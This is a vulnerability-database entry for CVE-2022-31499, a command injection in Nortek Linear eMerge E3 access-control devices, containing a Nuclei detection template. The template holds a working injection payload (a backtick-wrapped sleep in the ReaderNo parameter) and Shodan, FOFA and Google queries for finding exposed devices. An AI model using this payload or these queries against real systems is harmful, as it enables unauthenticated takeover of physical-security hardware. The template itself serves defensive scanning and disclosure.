Lucene search

ProjectDiscoveryNUCLEI:CVE-2022-31499

HistorySep 23, 2022 - 5:28 p.m.

Nortek Linear eMerge E3-Series <0.32-08f - Remote Command Injection

2022-09-2317:28:46

ProjectDiscovery

github.com

cve2022

packetstorm

emerge

rce

nortekcontrol

command injection

vulnerability

remote attackers

10 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

10 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

9.9 High

AI Score

Confidence

High

0.974 High

EPSS

Percentile

99.9%

JSON

Nortek Linear eMerge E3-Series devices before 0.32-08f are susceptible to remote command injection via ReaderNo. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. NOTE: this vulnerability exists because of an incomplete fix for CVE-2019-7256.

id: CVE-2022-31499

info:
  name: Nortek Linear eMerge E3-Series <0.32-08f - Remote Command Injection
  author: pikpikcu
  severity: critical
  description: |
    Nortek Linear eMerge E3-Series devices before 0.32-08f are susceptible to remote command injection via ReaderNo. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. NOTE: this vulnerability exists because of an incomplete fix for CVE-2019-7256.
  impact: |
    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected system.
  remediation: |
    Upgrade to a patched version of Nortek Linear eMerge E3-Series (>=0.32-08f) to mitigate this vulnerability.
  reference:
    - https://packetstormsecurity.com/files/167991/Nortek-Linear-eMerge-E3-Series-Command-Injection.html
    - https://github.com/omarhashem123/CVE-2022-31499
    - http://packetstormsecurity.com/files/167991/Nortek-Linear-eMerge-E3-Series-Command-Injection.html
    - https://nvd.nist.gov/vuln/detail/CVE-2022-31499
    - https://eg.linkedin.com/in/omar-1-hashem
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-31499
    cwe-id: CWE-78
    epss-score: 0.50608
    epss-percentile: 0.97247
    cpe: cpe:2.3:o:nortekcontrol:emerge_e3_firmware:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: nortekcontrol
    product: emerge_e3_firmware
    shodan-query:
      - title:"eMerge"
      - http.title:"emerge"
      - http.title:"linear emerge"
    fofa-query:
      - title="emerge"
      - title="linear emerge"
    google-query:
      - intitle:"linear emerge"
      - intitle:"emerge"
  tags: cve,cve2022,packetstorm,emerge,rce,nortekcontrol

http:
  - raw:
      - |
        @timeout: 15s
        GET /card_scan.php?No=123&ReaderNo=`sleep%207`&CardFormatNo=123 HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - duration>=7
          - contains(header, "text/html")
          - status_code == 200
          - contains(body, '{\"CardNo\":false')
        condition: and
# digest: 4a0a00473045022100d058fcd6d5713b61b34f3360f00df64a693d00394039aa9b4221e2ff15fecbfd02206ac1b9afe97a8d1ab3685121c6c13be2a42f7a983916a2dc62ab0a8dabcef443:922c64590222798bb761d5b6d8e72950